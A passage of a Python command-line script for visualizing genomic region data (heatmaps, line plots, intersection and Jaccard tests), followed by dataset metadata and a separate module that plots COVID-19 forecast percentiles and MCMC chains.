help='Extend the window outside of the given regions and compress the given region into fixed internal. (default: %(default)s)')
parser_lineplot.add_argument('-add_region_number', action="store_true", default=False,
help="Add the number of regions in the axis label. (default: %(default)s)")
################### Heatmap ##########################################
parser_heatmap = subparsers.add_parser('heatmap', help='Generate heatmap with various modes.')
choice_center = ['midpoint', 'bothends', 'upstream', 'downstream']
# Be consist as the arguments of GenomicRegionSet.relocate_regions
parser_heatmap.add_argument('input', help=helpinput)
parser_heatmap.add_argument('-o', metavar=' ', help=helpoutput)
parser_heatmap.add_argument('-ga', action="store_true",
help="Use genetic annotation data as input regions (e.g. TSS, TTS, exons and introns) instead of the BED files in the input matrix. (default: %(default)s)")
parser_heatmap.add_argument('-t', metavar=' ', default='heatmap', help=helptitle)
parser_heatmap.add_argument('-center', metavar=' ', choices=choice_center, default='midpoint',
help='Define the center to calculate coverage on the regions. Options are: ' + ', '.join(
choice_center) +
'.(Default:midpoint) The bothend mode will flap the right end region for calculation. (default: %(default)s)')
parser_heatmap.add_argument('-sort', metavar=' ', type=int, default=None,
help='Define the way to sort the signals.' +
'Default is no sorting at all, the signals arrange in the order of their position; ' +
'"0" is sorting by the average ranking of all signals; ' +
'"1" is sorting by the ranking of 1st column; "2" is 2nd and so on... (default: %(default)s)')
parser_heatmap.add_argument('-col', metavar=' ', default='regions', help=helpcol)
parser_heatmap.add_argument('-c', metavar=' ', default='reads', help=helpcolor)
parser_heatmap.add_argument('-row', metavar=' ', default='None', help=helprow)
parser_heatmap.add_argument('-e', metavar=' ', type=int, default=2000,
help='Define the extend length of interested region for plotting. (default: %(default)s)')
parser_heatmap.add_argument('-rs', metavar=' ', type=int, default=200,
help='Define the readsize for calculating coverage. (default: %(default)s)')
parser_heatmap.add_argument('-ss', metavar=' ', type=int, default=50,
help='Define the stepsize for calculating coverage. (default: %(default)s)')
parser_heatmap.add_argument('-bs', metavar=' ', type=int, default=100,
help='Define the binsize for calculating coverage. (default: %(default)s)')
parser_heatmap.add_argument('-organism', metavar=' ', default='hg19',
help='Define the organism. (default: %(default)s)')
parser_heatmap.add_argument('-color', action="store_true", help=help_define_color)
parser_heatmap.add_argument('-log', action="store_true", help='Set colorbar in log scale. (default: %(default)s)')
parser_heatmap.add_argument('-mp', action="store_true",
help="Perform multiprocessing for faster computation. (default: %(default)s)")
parser_heatmap.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_heatmap.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
################### Venn Diagram ########################################
parser_venn = subparsers.add_parser('venn', help='Generate Venn Diagram with peaks of gene list.')
parser_venn.add_argument('-s1', metavar=' ', default=None,
help="Define the file for gene set 1 (BED or gene list)")
parser_venn.add_argument('-s2', metavar=' ', default=None,
help="Define the file for gene set 2 (BED or gene list)")
parser_venn.add_argument('-s3', metavar=' ', default=None,
help="Define the file for gene set 3 (BED or gene list)")
parser_venn.add_argument('-s4', metavar=' ', default=None,
help="Define the file for gene set 3 (BED or gene list)")
parser_venn.add_argument('-l1', metavar=' ', default=None, help="Define label on venn diagram for set 1")
parser_venn.add_argument('-l2', metavar=' ', default=None, help="Define label on venn diagram for set 2")
parser_venn.add_argument('-l3', metavar=' ', default=None, help="Define label on venn diagram for set 3")
parser_venn.add_argument('-l4', metavar=' ', default=None, help="Define label on venn diagram for set 4")
parser_venn.add_argument('-o', metavar=' ', help=helpoutput)
parser_venn.add_argument('-t', metavar=' ', default='venn_diagram', help=helptitle)
parser_venn.add_argument('-organism', metavar=' ', help='Define the organism. ')
################### Integration ##########################################
parser_integration = subparsers.add_parser('integration',
help='Provides some tools to deal with experimental matrix or other purposes.')
parser_integration.add_argument('-ihtml', action="store_true",
help='Integrate all the html files within the given directory and generate index.html for all plots.')
parser_integration.add_argument('-l2m', help='Convert a given file list in txt format into a experimental matrix.')
parser_integration.add_argument('-o', help='Define the folder of the output file.')
################### Parsing the arguments ################################
# print(sys.argv)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(0)
elif len(sys.argv) == 2:
if sys.argv[1] == "-h" or sys.argv[1] == "--help":
parser.print_help()
sys.exit(0)
elif sys.argv[1] == "-v" or sys.argv[1] == "--version":
print(version_message)
sys.exit(0)
else:
# retrieve subparsers from parser
subparsers_actions = [action for action in parser._actions if
isinstance(action, argparse._SubParsersAction)]
# there will probably only be one subparser_action,but better save than sorry
for subparsers_action in subparsers_actions:
# get all subparsers and print help
for choice, subparser in subparsers_action.choices.items():
if choice == sys.argv[1]:
print("\nYou need more arguments.")
print("\nSubparser '{}'".format(choice))
subparser.print_help()
sys.exit(1)
else:
args = parser.parse_args()
if args.mode != 'integration':
if not args.o:
print("** Error: Please define the output directory (-o).")
sys.exit(1)
t0 = time.time()
# Normalised output path
args.o = os.path.normpath(os.path.join(current_dir, args.o))
check_dir(args.o)
check_dir(os.path.join(args.o, args.t))
# Input parameters dictionary
parameter = ["Time: " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"User: " + getpass.getuser(),
"\nCommand:\n\t$ " + " ".join(sys.argv)]
#################################################################################################
##### Main #####################################################################################
#################################################################################################
if args.mode == 'bed_profile':
################### BED profile ##########################################
print2(parameter, "\n############# BED profile #############")
print2(parameter, "\tInput path:\t" + args.i)
print2(parameter, "\tOutput path:\t" + os.path.join(args.o, args.t))
if not args.organism:
print("Please define organism...")
sys.exit(1)
else:
print2(parameter, "\tOrganism:\t" + args.organism)
if args.labels:
args.labels = args.labels.split(",")
args.sources = args.sources.split(",")
if not args.sources:
print("Please define the sources files corresponding to the the labels.")
sys.exit(1)
elif len(args.labels) != len(args.sources):
print("The number of labels doesn't match the number of sources.")
sys.exit(1)
if args.strand:
strands = []
for i, bss in enumerate(args.strand.split(",")):
if bss == "T":
strands.append(True)
args.labels[i] += "(strand-specific)"
elif bss == "F":
strands.append(False)
args.strand = strands
else:
args.strand = [True for i in args.labels]
if args.other:
others = []
for i, bss in enumerate(args.other.split(",")):
if bss == "T":
others.append(True)
elif bss == "F":
others.append(False)
args.other = others
else:
args.other = [True for i in args.labels]
bed_profile = BedProfile(args.i, args.organism, args)
bed_profile.cal_statistics()
bed_profile.plot_distribution_length()
bed_profile.plot_motif_composition()
if args.biotype:
bed_profile.plot_ref(ref_dir=args.biotype, tag="Biotype", other=True, strand=True, background=True)
if args.repeats:
bed_profile.plot_ref(ref_dir=args.repeats, tag="Repeats", other=True, background=True)
if args.genposi:
bed_profile.plot_ref(ref_dir=args.genposi, tag="Genetic position", other=False, strand=False)
if args.labels:
for i, label in enumerate(args.labels):
bed_profile.plot_ref(ref_dir=args.sources[i], tag=label, other=args.other[i], strand=args.strand[i], background=True)
bed_profile.write_tables(args.o, args.t)
bed_profile.save_fig(filename=os.path.join(args.o, args.t, "figure_" + args.t))
bed_profile.gen_html(args.o, args.t)
################### Projection test ##########################################
elif args.mode == 'projection':
# Fetching reference and query EM
print2(parameter, "\n############# Projection Test #############")
print2(parameter, "\tReference: " + args.r)
print2(parameter, "\tQuery: " + args.q)
print2(parameter, "\tOutput directory: " + os.path.basename(args.o))
print2(parameter, "\tExperiment title: " + args.t)
projection = Projection(args.r, args.q, load_bed=args.load)
projection.group_refque(args.g)
projection.colors(args.c, args.color)
if args.bg:
print2(parameter, "\tBackground: " + args.bg)
projection.set_background(bed_path=args.bg)
if args.union:
projection.ref_union()
projection.projection_test(organism=args.organism)
print2(parameter, "\tTaking union of references as the background. ")
else:
projection.projection_test(organism=args.organism)
# generate pdf
projection.plot(args.log, args.pw, args.ph)
output(f=projection.fig, directory=args.o, folder=args.t, filename="projection_test",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
if args.bed:
print2(parameter,
"\tOutput BED files: " + "/".join(os.path.join(args.o, args.t, "bed").split("/")[-3:]))
projection.output_interq(directory=os.path.join(args.o, args.t, "bed"))
# generate html
projection.gen_html(args.o, args.t, args=args)
if args.table:
projection.table(directory=args.o, folder=args.t)
print("\nAll related files are saved in: " + os.path.join(os.path.basename(args.o), args.t))
t1 = time.time()
print2(parameter, "\nTotal running time is : " + str(datetime.timedelta(seconds=round(t1 - t0))))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.r, directory=args.o, folder=args.t, filename="reference_experimental_matrix.txt")
copy_em(em=args.q, directory=args.o, folder=args.t, filename="query_experimental_matrix.txt")
list_all_index(path=args.o)
###########################################################################
################### Intersect Test ##########################################
if args.mode == 'intersect':
print2(parameter, "\n############ Intersection Test ############")
print2(parameter, "\tReference: " + args.r)
print2(parameter, "\tQuery: " + args.q)
print2(parameter, "\tOutput directory: " + os.path.basename(args.o))
print2(parameter, "\tExperiment title: " + args.t)
# Fetching reference and query EM
inter = Intersect(args.r, args.q, mode_count=args.m, organism=args.organism)
# Grouping
inter.group_refque(args.g)
# Setting background
inter.background(args.bg)
# Extension
if args.ex == 0:
pass
elif args.ex > 0:
inter.extend_ref(args.ex)
elif args.ex < 0:
print("\n**** extension percentage(-ex) should be positive value, not negative.\n")
sys.exit(1)
inter.colors(args.c, args.color)
print("\tProcessing data.", end="")
sys.stdout.flush()
inter.count_intersect(threshold=args.tc)
# generate pdf
print("\n\tGenerate graphics...")
inter.barplot(logt=args.log)
output(f=inter.bar, directory=args.o, folder=args.t, filename="intersection_bar",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
inter.stackedbar()
output(f=inter.sbar, directory=args.o, folder=args.t, filename="intersection_stackedbar",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
inter.barplot(logt=args.log, percentage=True)
output(f=inter.bar, directory=args.o, folder=args.t, filename="intersection_barp",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
if args.stest > 0:
print("\tStatistical testing by randomizing the regions...")
inter.stest(repeat=args.stest, threshold=args.tc, mp=args.mp)
# generate html
inter.gen_html(directory=args.o, title=args.t, align=50, args=args)
t1 = time.time()
print2(parameter, "\nAll related files are saved in: " + os.path.join(os.path.basename(args.o), args.t))
print2(parameter, "\nTotal running time is : " + str(datetime.timedelta(seconds=round(t1 - t0))))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.r, directory=args.o, folder=args.t, filename="reference_experimental_matrix.txt")
copy_em(em=args.q, directory=args.o, folder=args.t, filename="query_experimental_matrix.txt")
list_all_index(path=args.o)
###########################################################################
################### Jaccard test ##########################################
if args.mode == "jaccard":
"""Return the jaccard test of every possible comparisons between two ExperimentalMatrix.
Method:
The distribution of random jaccard index is calculated by randomizing query for given times.
Then, we compare the real jaccard index to the distribution and formulate p-value as
p-value = (# random jaccard > real jaccard)/(# random jaccard)
"""
print("\n############## Jaccard Test ###############")
jaccard = Jaccard(args.r, args.q)
jaccard.group_refque(args.g)
jaccard.colors(args.c, args.color)
# jaccard test
jaccard.jaccard_test(args.rt, args.organism)
parameter = parameter + jaccard.parameter
t1 = time.time()
# ploting and generate pdf
jaccard.plot(logT=args.nlog)
for i, f in enumerate(jaccard.fig):
output(f=f, directory=args.o, folder=args.t, filename="jaccard_test" + str(i + 1),
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
# generate html
jaccard.gen_html(args.o, args.t)
if args.table:
jaccard.table(directory=args.o, folder=args.t)
print("\nAll related files are saved in: " + os.path.join(dir, args.o, args.t))
print2(parameter, "\nTotal running time is : " + str(datetime.timedelta(seconds=round(t1 - t0))))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.r, directory=args.o, folder=args.t, filename="Reference_experimental_matrix.txt")
copy_em(em=args.q, directory=args.o, folder=args.t, filename="Query_experimental_matrix.txt")
list_all_index(path=args.o)
###########################################################################
################### Combinatorial Test ##########################################
if args.mode == 'combinatorial':
print("\n############ Combinatorial Test ############")
# Fetching reference and query EM
# comb = Combinatorial(args.r,args.q, mode_count=args.m, organism=args.organism)
inter = Intersect(args.r, args.q, mode_count=args.m, organism=args.organism)
# Setting background
inter.background(args.bg)
# Grouping
inter.group_refque(args.g)
# Extension
if args.ex == 0:
pass
elif args.ex > 0:
inter.extend_ref(args.ex)
elif args.ex < 0:
print("\n**** extension percentage(-ex) should be positive value, not negative.\n")
sys.exit(1)
# Combinatorial
print2(parameter, "Generating all combinatorial regions for further analysis...")
inter.combinatorial()
inter.count_intersect(threshold=args.tc, frequency=True)
# generate pdf
inter.colors_comb()
# inter.barplot(args.log)
# output(f=inter.bar, directory = args.output, folder = args.title, filename="intersection_bar",extra=matplotlib.pyplot.gci(),pdf=True,show=args.show)
# if args.stackedbar:
# inter.colors(args.c, args.color,ref_que = "ref")
inter.comb_stacked_plot()
output(f=inter.sbar, directory=args.o, folder=args.t, filename="intersection_stackedbar",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
if args.venn:
inter.comb_venn(directory=os.path.join(args.o, args.t))
# if args.lineplot:
# inter.comb_lineplot()
if args.stest > 0:
inter.stest(repeat=args.stest, threshold=args.tc, mp=args.mp)
# generate html
inter.gen_html_comb(directory=args.o, title=args.t, align=50, args=args)
# parameter = parameter + inter.parameter
t1 = time.time()
print("\nAll related files are saved in: " + os.path.join(current_dir, args.o, args.t))
print2(parameter, "\nTotal running time is : " + str(datetime.timedelta(seconds=round(t1 - t0))))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.r, directory=args.o, folder=args.t, filename="Reference_experimental_matrix.txt")
copy_em(em=args.q, directory=args.o, folder=args.t, filename="Query_experimental_matrix.txt")
# list_all_index(path=args.o)
###########################################################################
################### Boxplot ##########################################
if args.mode == 'boxplot':
print("\n################# Boxplot #################")
boxplot = Boxplot(args.input, fields=[args.g, args.s, args.c], title=args.t, df=args.df)
print2(parameter, "\nStep 1/5: Combining all regions")
boxplot.combine_allregions()
print2(parameter, " " + str(len(boxplot.all_bed)) + " regions from all bed files are combined.")
t1 = time.time()
print2(parameter, " --- finished in {0} secs\n".format(round(t1 - t0)))
# Coverage of reads on all_bed
print2(parameter, "Step 2/5: Calculating coverage of each bam file on all regions")
boxplot.bedCoverage()
t2 = time.time()
print2(parameter, " --- finished in {0} (H:M:S)\n".format(datetime.timedelta(seconds=round(t2 - t1))))
# Quantile normalization
print2(parameter, "Step 3/5: Quantile normalization of all coverage table")
if args.nqn:
print2(parameter, " No quantile normalization.")
boxplot.norm_table = boxplot.all_table
else:
boxplot.quantile_normalization()
t3 = time.time()
print2(parameter, " --- finished in {0} secs\n".format(round(t3 - t2)))
# Generate individual table for each bed
print2(parameter, "Step 4/5: Constructing different tables for box plot")
boxplot.tables_for_plot()
# if args.table: boxplot.print_plot_table(directory = args.o, folder = args.t)
t4 = time.time()
print2(parameter, " --- finished in {0} secs\n".format(round(t4 - t3)))
# Plotting
print2(parameter, "Step 5/5: Plotting")
boxplot.group_tags(groupby=args.g, sortby=args.s, colorby=args.c)
boxplot.group_data(directory=args.o, folder=args.t, log=args.nlog)
boxplot.color_map(colorby=args.c, definedinEM=args.color)
boxplot.plot(title=args.t, logT=args.nlog, scol=args.scol, ylim=args.ylim, pw=args.pw, ph=args.ph)
if args.table:
boxplot.print_plot_table(directory=args.o, folder=args.t)
output(f=boxplot.fig, directory=args.o, folder=args.t, filename="boxplot", extra=matplotlib.pyplot.gci(),
pdf=True,
show=args.show)
# HTML
boxplot.gen_html(args.o, args.t, align=50)
t5 = time.time()
print2(parameter, " --- finished in {0} secs\n".format(round(t5 - t4)))
print2(parameter,
"Total running time is: " + str(datetime.timedelta(seconds=round(t5 - t0))) + " (H:M:S)\n")
print("\nAll related files are saved in: " + os.path.join(current_dir, args.o, args.t))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.input, directory=args.o, folder=args.t)
list_all_index(path=args.o)
################### Lineplot #########################################
if args.mode == 'lineplot':
if args.scol and args.srow:
print("** Err: -scol and -srow cannot be used simutaneously.")
sys.exit(1)
print("\n################ Lineplot #################")
# Read experimental matrix
t0 = time.time()
if "reads" not in (args.g, args.col, args.c, args.row):
print("Please add 'reads' tag as one of grouping, sorting, or coloring argument.")
sys.exit(1)
# if "regions" not in (args.col, args.c, args.row):
# print("Please add 'regions' tag as one of grouping, sorting, or coloring argument.")
# sys.exit(1)
if not os.path.isfile(args.input):
print("Please check the input experimental matrix again. The given path is wrong.")
sys.exit(1)
print2(parameter, "Parameters:\tExtend length:\t" + str(args.e))
print2(parameter, "\t\tRead size:\t" + str(args.rs))
print2(parameter, "\t\tBin size:\t" + str(args.bs))
print2(parameter, "\t\tStep size:\t" + str(args.ss))
print2(parameter, "\t\tCenter mode:\t" + str(args.center + "\n"))
lineplot = Lineplot(em_path=args.input, title=args.t, annotation=args.ga,
organism=args.organism, center=args.center, extend=args.e, rs=args.rs,
bs=args.bs, ss=args.ss, df=args.df, dft=args.dft,
fields=[args.g, args.col, args.row, args.c],
test=args.test, sense=args.sense, strand=args.strand, flipnegative=args.flip_negative,
outside=args.extend_outside, add_number=args.add_region_number)
# Processing the regions by given parameters
print2(parameter, "Step 1/3: Processing regions by given parameters")
lineplot.relocate_bed()
t1 = time.time()
print2(parameter, "\t--- finished in {0} secs".format(str(round(t1 - t0))))
if args.mp > 0:
print2(parameter,
"\nStep 2/3: Calculating the coverage to all reads and averaging with multiprocessing ")
else:
print2(parameter, "\nStep 2/3: Calculating the coverage to all reads and averaging")
lineplot.group_tags(groupby=args.g, rowby=args.row, columnby=args.col, colorby=args.c)
lineplot.gen_cues()
lineplot.coverage(sortby=args.row, mp=args.mp, log=args.log, average=args.average)
t2 = time.time()
print2(parameter, "\t--- finished in {0} (H:M:S)".format(str(datetime.timedelta(seconds=round(t2 - t1)))))
# Plotting
print2(parameter, "\nStep 3/3: Plotting the lineplots")
lineplot.colormap(colorby=args.c, definedinEM=args.color)
lineplot.plot(output=args.o, printtable=args.table, ylog=args.log,
scol=args.scol, srow=args.srow, w=args.pw, h=args.ph)
for i, f in enumerate(lineplot.fig):
output(f=f, directory=args.o, folder=args.t, filename="lineplot_" + lineplot.group_tags[i],
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
lineplot.gen_html(args.o, args.t)
t3 = time.time()
print2(parameter, "\t--- finished in {0} secs".format(str(round(t3 - t2))))
print2(parameter,
"\nTotal running time is : " + str(datetime.timedelta(seconds=round(t3 - t0))) + "(H:M:S)\n")
print("\nAll related files are saved in: " + os.path.join(dir, args.o, args.t))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.input, directory=args.o, folder=args.t)
list_all_index(path=args.o)
################### Heatmap ##########################################
if args.mode == 'heatmap':
print("\n################# Heatmap #################")
# Most part of heat map are the same as lineplot, so it share the same class as lineplot
# Read experimental matrix
t0 = time.time()
if "reads" not in (args.g, args.col, args.c, args.row):
print("Please add 'reads' tag as one of grouping, sorting, or coloring argument.")
sys.exit(1)
# if "regions" not in (args.g, args.col, args.c, args.row):
# print("Please add 'regions' tag as one of grouping, sorting, or coloring argument.")
# sys.exit(1)
print2(parameter, "Parameters:\tExtend length:\t" + str(args.e))
print2(parameter, "\t\tRead size:\t" + str(args.rs))
print2(parameter, "\t\tBin size:\t" + str(args.bs))
print2(parameter, "\t\tStep size:\t" + str(args.ss))
print2(parameter, "\t\tCenter mode:\t" + str(args.center + "\n"))
lineplot = Lineplot(em_path=args.input, title=args.t, annotation=args.ga,
organism=args.organism, center=args.center, extend=args.e, rs=args.rs,
bs=args.bs, ss=args.ss, df=False, fields=[args.col, args.row, args.c],
dft=args.dft, flipnegative=False, sense=False, strand=False, test=False)
# Processing the regions by given parameters
print2(parameter, "Step 1/4: Processing regions by given parameters")
lineplot.relocate_bed()
t1 = time.time()
print2(parameter, " --- finished in {0} secs".format(str(round(t1 - t0))))
if args.mp:
print2(parameter,
"\nStep 2/4: Calculating the coverage to all reads and averaging with multiprocessing ")
else:
print2(parameter, "\nStep 2/4: Calculating the coverage to all reads and averaging")
lineplot.group_tags(groupby=args.col, sortby=args.row, colorby=args.c)
lineplot.gen_cues()
lineplot.coverage(sortby=args.s, heatmap=True, logt=args.log, mp=args.mp)
t2 = time.time()
print2(parameter, " --- finished in {0} (h:m:s)".format(str(datetime.timedelta(seconds=round(t2 - t1)))))
# Sorting
print2(parameter, "\nStep 3/4: Sorting the data for heatmap")
lineplot.hmsort(sort=args.sort)
t3 = time.time()
print2(parameter, " --- finished in {0} (h:m:s)".format(str(datetime.timedelta(seconds=round(t3 - t2)))))
# Plotting
print2(parameter, "\nStep 4/4: Plotting the heatmap")
lineplot.hmcmlist(colorby=args.c, definedinEM=args.color)
lineplot.heatmap(args.log)
for i, name in enumerate(lineplot.hmfiles):
output(f=lineplot.figs[i], directory=args.o, folder=args.t, filename=name, pdf=True, show=args.show)
lineplot.gen_htmlhm(args.o, args.t)
t4 = time.time()
print2(parameter, " --- finished in {0} secs".format(str(round(t4 - t3))))
print2(parameter,
"\nTotal running time is : " + str(datetime.timedelta(seconds=round(t4 - t0))) + "(H:M:S)\n")
print("\nAll related files are saved in: " + os.path.join(current_dir, args.o, args.t))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.input, directory=args.o, folder=args.t)
list_all_index(path=args.o)
################### Venn Diagram ##########################################
if args.mode == 'venn':
print("\n################# Venn Diagram ###############")
if not os.path.exists(os.path.join(args.o, args.t)):
os.makedirs(os.path.join(args.o, args.t))
sets = [s for s in [args.s1, args.s2, args.s3, args.s4] if s]
venn = Venn(sets=sets, organism=args.organism)
f = venn.venn_diagram(directory=args.o, title=args.t, labels=[args.l1, args.l2, args.l3, args.l4])
output(f=f, directory=args.o, folder=args.t, filename="venn", pdf=True)
################### Integration ##########################################
if args.mode == 'integration':
print("\n################# Integration ###############")
if args.ihtml:
list_all_index(path=args.o)
| 66.764972 | 263 | 0.581803 | 6,795 | 59,087 | 4.966004 | 0.091685 | 0.053461 | 0.043119 | 0.047297 | 0.656176 | 0.62989 | 0.58849 | 0.519115 | 0.476944 | 0.452495 | 0 | 0.007264 | 0.261462 | 59,087 | 884 | 264 | 66.840498 | 0.766007 | 0.037995 | 0 | 0.309353 | 0 | 0.051799 | 0.318442 | 0.00543 | 0.002878 | 0 | 0 | 0 | 0 | 1 | 0.001439 | false | 0.005755 | 0.025899 | 0 | 0.027338 | 0.143885 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4180dd4796db00aa27180113a9c270adce7f7aee | 8,390 | py | Python | viz/uncertainty.py | WadhwaniAI/covid-modelling | db9f89bfbec392ad4de6b4583cfab7c3d823c1c9 | [
"MIT"
] | 3 | 2021-06-23T10:27:11.000Z | 2022-02-09T07:50:42.000Z | viz/uncertainty.py | WadhwaniAI/covid-modelling | db9f89bfbec392ad4de6b4583cfab7c3d823c1c9 | [
"MIT"
] | 3 | 2021-06-23T09:36:29.000Z | 2022-01-13T03:38:16.000Z | viz/uncertainty.py | WadhwaniAI/covid-modelling | db9f89bfbec392ad4de6b4583cfab7c3d823c1c9 | [
"MIT"
] | null | null | null | import datetime
from copy import copy
from datetime import timedelta
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from adjustText import adjust_text
from matplotlib.lines import Line2D
from matplotlib.patches import Patch
from utils.generic.enums import Columns
from viz.utils import axis_formatter
def plot_ptiles(predictions_dict, vline=None, which_compartments=[Columns.active],
plot_individual_curves=True, log_scale=False, truncate_series=True,
left_truncation_buffer=30, ci_lb=2.5, ci_ub=97.5):
predictions = copy(predictions_dict['forecasts'])
try:
del predictions['best']
except:
pass
df_master = list(predictions.values())[0]
for df in list(predictions.values())[1:]:
if isinstance(df, pd.DataFrame):
df = df.reset_index()
else:
df = df['df_prediction']
df_master = pd.concat([df_master, df], ignore_index=True)
train_period = predictions_dict['run_params']['split']['train_period']
val_period = predictions_dict['run_params']['split']['val_period']
val_period = 0 if val_period is None else val_period
df_true = predictions_dict['df_district']
if truncate_series:
df_true = df_true[df_true['date'] >
(list(predictions.values())[0]['date'].iloc[0] -
timedelta(days=left_truncation_buffer))]
df_true.reset_index(drop=True, inplace=True)
plots = {}
for compartment in which_compartments:
fig, ax = plt.subplots(figsize=(12, 12))
texts = []
ax.plot(df_true[Columns.date.name].to_numpy(), df_true[compartment.name].to_numpy(),
'-o', color='C0', label=f'{compartment.label} (Observed)')
if plot_individual_curves:
for _, (ptile, df_prediction) in enumerate(predictions.items()):
sns.lineplot(x=Columns.date.name, y=compartment.name, data=df_prediction,
ls='-', label=f'{compartment.label} Percentile :{ptile}')
texts.append(plt.text(
x=df_prediction[Columns.date.name].iloc[-1],
y=df_prediction[compartment.name].iloc[-1], s=ptile))
else:
ax.plot(df_master[Columns.date.name], df_master[compartment.name],
ls='-', label=f'{compartment.label}')
ax.fill_between(predictions[ci_lb][Columns.date.name], predictions[ci_lb][compartment.name],
predictions[ci_ub][compartment.name], ls='-', label=f'{compartment.label}')
if vline:
plt.axvline(datetime.datetime.strptime(vline, '%Y-%m-%d'))
ax.axvline(x=list(predictions.values())[0].iloc[0, :]['date'],
ls=':', color='brown', label='Train starts')
ax.axvline(x=list(predictions.values())[0].iloc[train_period+val_period-1, :]['date'],
ls=':', color='black', label='Data Last Date')
ax.set_xlim(ax.get_xlim()[0], ax.get_xlim()[1] + 10)
adjust_text(texts, arrowprops=dict(arrowstyle="->", color='r', lw=0.5))
axis_formatter(ax, log_scale=log_scale)
fig.suptitle('Forecast of all deciles for {} '.format(compartment.name), fontsize=16)
plots[compartment] = fig
return plots
def plot_ptiles_reichlab(df_comb, model, location, target='inc death', plot_true=False, plot_point=True,
plot_individual_curves=True, ci_lb=2.5, ci_ub=97.5, color='C0', ax=None, ):
compartment = 'deceased' if 'death' in target else 'total'
mode = 'inc' if 'inc' in target else 'cum'
compartment = Columns.from_name(compartment)
df_plot = copy(df_comb.loc[(df_comb['model'] == model) & (
df_comb['location'] == location), :])
df_plot = df_plot[[target in x for x in df_plot['target']]]
if ax is None:
fig, ax = plt.subplots(figsize=(12, 12))
else:
fig = None
if plot_true:
df_true = df_plot.groupby('target_end_date').mean().reset_index()
ax.plot(df_true['target_end_date'].to_numpy(), df_true['true_value'].to_numpy(),
'--o', color=compartment.color)
if plot_point:
df_point = df_plot[df_plot['type'] == 'point']
ax.plot(df_point['target_end_date'].to_numpy(), df_point['forecast_value'].to_numpy(),
'-o', color=color)
texts = []
df_quantiles = df_plot[df_plot['type'] == 'quantile']
quantiles = df_quantiles.groupby('quantile').sum().index
if plot_individual_curves:
for _, qtile in enumerate(quantiles):
df_qtile = df_quantiles[df_quantiles['quantile']
== qtile].infer_objects()
label = round(qtile*100) if qtile * \
100 % 1 < 1e-8 else round(qtile*100, 1)
sns.lineplot(x='target_end_date', y='value', data=df_qtile, ls='-')
texts.append(plt.text(
x=df_qtile['target_end_date'].iloc[-1],
y=df_qtile['value'].iloc[-1], s=label))
else:
df_ci_lb = df_quantiles[df_quantiles['quantile']
== ci_lb*0.01].infer_objects()
df_ci_ub = df_quantiles[df_quantiles['quantile']
== ci_ub*0.01].infer_objects()
ax.fill_between(df_ci_ub['target_end_date'], df_ci_lb['forecast_value'],
df_ci_ub['forecast_value'], color=color, alpha=0.1, label=f'{model} 95% CI')
ax.set_xlim(ax.get_xlim()[0], ax.get_xlim()[1] + 10)
adjust_text(texts, arrowprops=dict(arrowstyle="->", color='r', lw=0.5))
axis_formatter(ax)
legend_elements = []
if plot_true:
legend_elements += [
Line2D([0], [0], ls='--', marker='o', color=compartment.color,
label=f'{target.title()} (Observed)')]
if plot_point:
legend_elements += [
Line2D([0], [0], ls='-', marker='o', color=color,
label=f'{model} {target.title()} Point Forecast')]
if plot_individual_curves:
legend_elements += [
Line2D([0], [0], ls='-', color='blue',
label=f'{model} {target.title()} Percentiles'),
]
else:
legend_elements += [
Patch(facecolor=color, edgecolor=color, alpha=0.1,
label=f'{model} {target.title()} 95% CI'),
]
ax.legend(handles=legend_elements)
ax.set_title('Forecast for {}, {}, {} {}'.format(model, location,
mode.title(), compartment.label), fontsize=16)
return fig, ax
def plot_beta_loss(dict_of_trials):
fig, ax = plt.subplots(figsize=(12, 8))
ax.plot(list(dict_of_trials.keys()), list(dict_of_trials.values()))
ax.set_ylabel('Loss value')
ax.set_xlabel('Beta value')
ax.set_title('How the beta loss changes with beta')
return fig, ax
def plot_chains(mcmc, figsize=(20, 20)):
"""Summary
Args:
mcmc (MCMC): Description
out_dir (str): Description
"""
params = [*mcmc.prior_ranges.keys()]
for param in params:
plt.figure(figsize=figsize)
plt.subplot(2,1,1)
for i, chain in enumerate(mcmc.chains):
df = pd.DataFrame(chain[0])
samples = np.array(df[param])
plt.plot(list(range(len(samples))), samples, label='chain {}'.format(i+1))
plt.xlabel("iterations")
plt.title("Accepted {} samples".format(param))
plt.legend()
plt.subplot(2,1,2)
for i, chain in enumerate(mcmc.chains):
df = pd.DataFrame(chain[1])
try:
samples = np.array(df[param])
plt.scatter(list(range(len(samples))), samples, s=4, label='chain {}'.format(i+1))
except:
continue
plt.xlabel("iterations")
plt.title("Rejected {} samples".format(param))
plt.legend()
for param in params:
plt.figure(figsize=(20, 10))
for i, chain in enumerate(mcmc.chains):
df = pd.DataFrame(chain[0])
samples = np.array(df[param])
mean = np.mean(samples)
sns.kdeplot(np.array(samples), bw=0.005*mean)
plt.title("Density plot of {} samples".format(param))
plt.show()
